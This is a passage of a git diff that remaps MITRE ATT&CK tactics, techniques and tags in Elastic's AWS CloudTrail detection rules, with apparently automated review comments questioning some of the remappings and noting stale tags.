 id = "T1552"
 name = "Unsecured Credentials"
 reference = "https://attack.mitre.org/techniques/T1552/"
-[[rule.threat.technique.subtechnique]]
-id = "T1552.005"
-name = "Cloud Instance Metadata API"
-reference = "https://attack.mitre.org/techniques/T1552/005/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["aws.cloudtrail.user_identity.session_context.session_issuer.arn"]
diff --git a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml
index d134a095da1..5d27f5e2070 100644
--- a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml
+++ b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml
@@ -2,7 +2,7 @@ creation_date = "2020/06/04"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -74,15 +74,7 @@ references = ["https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserTo
 risk_score = 21
 rule_id = "333de828-8190-4cf5-8d7c-7575846f6fe0"
 severity = "low"
-tags = [
-    "Domain: Cloud",
-    "Data Source: AWS",
-    "Data Source: Amazon Web Services",
-    "Use Case: Identity and Access Audit",
-    "Tactic: Credential Access",
-    "Tactic: Persistence",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -97,23 +89,28 @@ event.dataset: aws.cloudtrail and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.investigation_fields]
 field_names = [
     "@timestamp",
diff --git a/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml b/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml
index 2fd99ea0bd8..d744ecf6047 100644
--- a/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml
+++ b/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/07/21"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -132,17 +132,21 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
+[[rule.threat.technique.subtechnique]]
+id = "T1110.001"
+name = "Password Guessing"
+reference = "https://attack.mitre.org/techniques/T1110/001/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [rule.threshold]
 field = ["cloud.account.id"]
 value = 10
diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml
index f762db3aa20..30221b5bef0 100644
--- a/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml
+++ b/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/26"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -82,22 +82,21 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1562.008"
+name = "Disable or Modify Cloud Logs"
+reference = "https://attack.mitre.org/techniques/T1562/008/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml
index b81501f12d9..1955e7dfa15 100644
--- a/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml
+++ b/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/10"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -83,22 +83,21 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1562.008"
+name = "Disable or Modify Cloud Logs"
+reference = "https://attack.mitre.org/techniques/T1562/008/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml b/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml
index 3dedaf38d39..166538416bc 100644
--- a/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml
+++ b/rules/integrations/aws/defense_evasion_cloudwatch_alarm_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/15"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -130,27 +130,21 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.006"
-name = "Indicator Blocking"
-reference = "https://attack.mitre.org/techniques/T1562/006/"
-
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml b/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml
index 8d37020dce8..5e84d659e4b 100644
--- a/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml
+++ b/rules/integrations/aws/defense_evasion_config_service_rule_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/26"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -129,27 +129,21 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.008"
-name = "Disable or Modify Cloud Logs"
-reference = "https://attack.mitre.org/techniques/T1562/008/"
-
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml b/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml
index 41c5766b582..941c9de02dd 100644
--- a/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml
+++ b/rules/integrations/aws/defense_evasion_configuration_recorder_stopped.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/06/16"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -109,27 +109,21 @@ event.dataset: aws.cloudtrail
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.008"
-name = "Disable or Modify Cloud Logs"
-reference = "https://attack.mitre.org/techniques/T1562/008/"
-
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml b/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml
index 67bc1c4472a..2543f7add08 100644
--- a/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml
+++ b/rules/integrations/aws/defense_evasion_ec2_serial_console_access_enabled.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/05"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/02/05"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
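Review bot: Dropping T1562.008 and keeping only T1562.001 for the configuration-recorder-stopped rule reads backwards: stopping the AWS Config recorder halts a cloud-side record of resource changes, which is what "Disable or Modify Cloud Logs" describes, while "Disable or Modify Tools" is about security tooling. Unless the intent is to treat Config strictly as a compliance tool rather than a log source, keep `id = "T1562.008"` (alone or next to `.001`). The same swap is made for the Config rule-deletion rule in the previous hunk; whichever reading is chosen should be applied to both so the two Config rules do not end up mapped differently.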
@@ -95,14 +95,7 @@ references = [
 risk_score = 73
 rule_id = "e9fe3645-f588-43d6-99f5-437b3ef56f25"
 severity = "high"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS EC2",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -116,22 +109,34 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
+[[rule.threat.technique]]
+id = "T1578"
+name = "Modify Cloud Compute Infrastructure"
+reference = "https://attack.mitre.org/techniques/T1578/"
+[[rule.threat.technique.subtechnique]]
+id = "T1578.005"
+name = "Modify Cloud Compute Configurations"
+reference = "https://attack.mitre.org/techniques/T1578/005/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1133"
+name = "External Remote Services"
+reference = "https://attack.mitre.org/techniques/T1133/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml
index 5c526fa7a83..9c3dc41b044 100644
--- a/rules/integrations/aws/defense_evasion_rds_instance_restored.toml
+++ b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/06/29"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/21"
+updated_date = "2026/03/23"
 [rule]
 author = ["Austin Songer", "Elastic"]
@@ -131,15 +131,7 @@ references = [
 risk_score = 47
 rule_id = "bf1073bf-ce26-4607-b405-ba1ed8e9e204"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS RDS",
- "Use Case: Asset Visibility",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Collection", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS RDS", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -153,27 +145,34 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1213"
+name = "Data from Information Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1578"
 name = "Modify Cloud Compute Infrastructure"
 reference = "https://attack.mitre.org/techniques/T1578/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1578.002"
 name = "Create Cloud Instance"
 reference = "https://attack.mitre.org/techniques/T1578/002/"
-[[rule.threat.technique.subtechnique]]
-id = "T1578.004"
-name = "Revert Cloud Instance"
-reference = "https://attack.mitre.org/techniques/T1578/004/"
-
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
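Review bot: The new Collection entry with T1213 "Data from Information Repositories" is only a loose fit for an RDS restore event: restoring an instance from a snapshot creates a queryable copy but collects nothing by itself, so the mapping holds only if the rule's description (outside this hunk) frames the restore as staging for data access, and the parent technique is used here without the `T1213.006` "Databases" subtechnique that the snapshot-export rule later in this diff applies to the same data source. Either add the subtechnique for consistency or record why the parent alone is intended. Keeping `T1578.002` while dropping `T1578.004` is consistent with a restore creating a new instance rather than reverting an existing one.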
diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml b/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml
index a3f2352b5a1..121aa4b0ea2 100644
--- a/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml
+++ b/rules/integrations/aws/defense_evasion_s3_bucket_configuration_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/05/27"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -122,39 +122,29 @@ event.dataset:aws.cloudtrail and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1070"
-name = "Indicator Removal"
-reference = "https://attack.mitre.org/techniques/T1070/"
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.008"
-name = "Disable or Modify Cloud Logs"
-reference = "https://attack.mitre.org/techniques/T1562/008/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1490"
 name = "Inhibit System Recovery"
 reference = "https://attack.mitre.org/techniques/T1490/"
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml b/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml
index d7bf8608f45..d9ffd7ed065 100644
--- a/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml
+++ b/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml
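Review bot: Removing the `T1562.008` subtechnique leaves only the parent T1562 on a rule that, going by its name, covers deletion of S3 bucket configuration; if the query (above this hunk, not shown in the diff) still matches `DeleteBucketLogging`, that subtechnique was the most precise mapping for the logging case and should stay. Dropping T1070 is reasonable because disabling a configuration prevents future indicators rather than removing existing ones. Keep `.008` unless the query no longer includes the bucket-logging API, and say so in the rule description if it was removed on purpose.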
@@ -2,7 +2,7 @@
 creation_date = "2024/04/12"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -118,15 +118,7 @@ references = [
 risk_score = 21
 rule_id = "ff320c56-f8fa-11ee-8c44-f661ea17fbce"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: Amazon S3",
- "Use Case: Asset Visibility",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon S3", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -140,44 +132,21 @@ info where event.dataset == "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1070"
-name = "Indicator Removal"
-reference = "https://attack.mitre.org/techniques/T1070/"
-
-[[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.008"
-name = "Disable or Modify Cloud Logs"
-reference = "https://attack.mitre.org/techniques/T1562/008/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1485"
 name = "Data Destruction"
 reference = "https://attack.mitre.org/techniques/T1485/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1485.001"
 name = "Lifecycle-Triggered Deletion"
 reference = "https://attack.mitre.org/techniques/T1485/001/"
-
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml
index d441f9f41fd..1ae94df10c8 100644
--- a/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml
+++ b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/08"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -76,16 +76,7 @@ references = [
 risk_score = 47
 rule_id = "bab88bb8-cdd9-11ef-bd9a-f661ea17fbcd"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS SQS",
- "Use Case: Threat Detection",
- "Use Case: Log Auditing",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SQS", "Use Case: Threat Detection", "Use Case: Log Auditing", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -99,22 +90,16 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.008"
-name = "Disable or Modify Cloud Logs"
-reference = "https://attack.mitre.org/techniques/T1562/008/"
-
+[[rule.threat.technique]]
+id = "T1485"
+name = "Data Destruction"
+reference = "https://attack.mitre.org/techniques/T1485/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml b/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml
index ff639694edb..4ae04aa84e1 100644
--- a/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml
+++ b/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/08/19"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -23,16 +23,7 @@ references = [
 risk_score = 47
 rule_id = "7a5cc9a8-5ea3-11ef-beec-f661ea17fbce"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: Amazon Web Services",
- "Data Source: AWS",
- "Data Source: AWS STS",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Tactic: Persistence",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Amazon Web Services", "Data Source: AWS", "Data Source: AWS STS", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -90,37 +81,21 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-[[rule.threat.technique.subtechnique]]
-id = "T1550.001"
-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1098.001"
 name = "Additional Cloud Credentials"
 reference = "https://attack.mitre.org/techniques/T1098/001/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["aws.cloudtrail.user_identity.arn"]
diff --git a/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml b/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml
index 07be3b05e01..1865f4c799b 100644
--- a/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml
+++ b/rules/integrations/aws/discovery_ec2_userdata_request_for_ec2_instance.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/14"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2025/12/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -116,34 +116,16 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1580"
 name = "Cloud Infrastructure Discovery"
 reference = "https://attack.mitre.org/techniques/T1580/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-[[rule.threat.technique.subtechnique]]
-id = "T1552.005"
-name = "Cloud Instance Metadata API"
-reference = "https://attack.mitre.org/techniques/T1552/005/"
-
-
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["cloud.account.id", "user.name", "aws.cloudtrail.flattened.request_parameters.instanceId"]
diff --git a/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml b/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml
index 197e4fc57fc..357105f5229 100644
--- a/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml
+++ b/rules/integrations/aws/discovery_iam_principal_enumeration_via_update_assume_role_policy.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/07/16"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
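Review bot: This hunk removes the whole TA0006 / T1552.005 entry, but the rule's `tags` array for this file is not touched anywhere in the diff; if it still lists `"Tactic: Credential Access"` that tag is now orphaned against `rule.threat` and will disagree with the tactic/tag consistency the other files in this change are being brought to. Check the tags block above this hunk and drop the stale tag in the same commit. Mapping a `DescribeInstanceAttribute` user-data request only to T1580 under Discovery is defensible since the call is not the metadata API, but the user-data payload frequently embeds secrets, so the rule will no longer appear in a Credential Access view; if that is deliberate, note it in the description.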
@@ -91,16 +91,7 @@ references = [
 risk_score = 47
 rule_id = "ea248a02-bc47-4043-8e94-2885b19b2636"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Data Source: AWS",
- "Data Source: Amazon Web Services",
- "Data Source: AWS IAM",
- "Use Case: Identity and Access Audit",
- "Resources: Investigation Guide",
- "Tactic: Discovery",
- "Tactic: Credential Access",
-]
+tags = ["Domain: Cloud", "Tactic: Discovery", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "threshold"
@@ -115,34 +106,21 @@ event.dataset: "aws.cloudtrail"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1087.004"
 name = "Cloud Account"
 reference = "https://attack.mitre.org/techniques/T1087/004/"
-
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1110"
-name = "Brute Force"
-reference = "https://attack.mitre.org/techniques/T1110/"
-
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [rule.threshold]
 field = ["cloud.account.id", "user.name", "source.ip"]
 value = 25
diff --git a/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml b/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml
index 1998dca1376..1653177f8bc 100644
--- a/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml
+++ b/rules/integrations/aws/discovery_ssm_inventory_reconnaissance.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/11"
 integration = ["aws"]
 maturity = "production"
-updated_date = "2026/02/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -124,10 +124,11 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1538"
-name = "Cloud Service Dashboard"
-reference = "https://attack.mitre.org/techniques/T1538/"
+id = "T1518"
+name = "Software Discovery"
+reference = "https://attack.mitre.org/techniques/T1518/"
 [[rule.threat.technique]]
 id = "T1580"
@@ -138,7 +139,6 @@ reference = "https://attack.mitre.org/techniques/T1580/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["cloud.account.id", "user.name"]
diff --git a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml
index f410c0aad7a..01217202d6c 100644
--- a/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml
+++ b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/04/30"
 integration = ["aws"]
 maturity = "production"
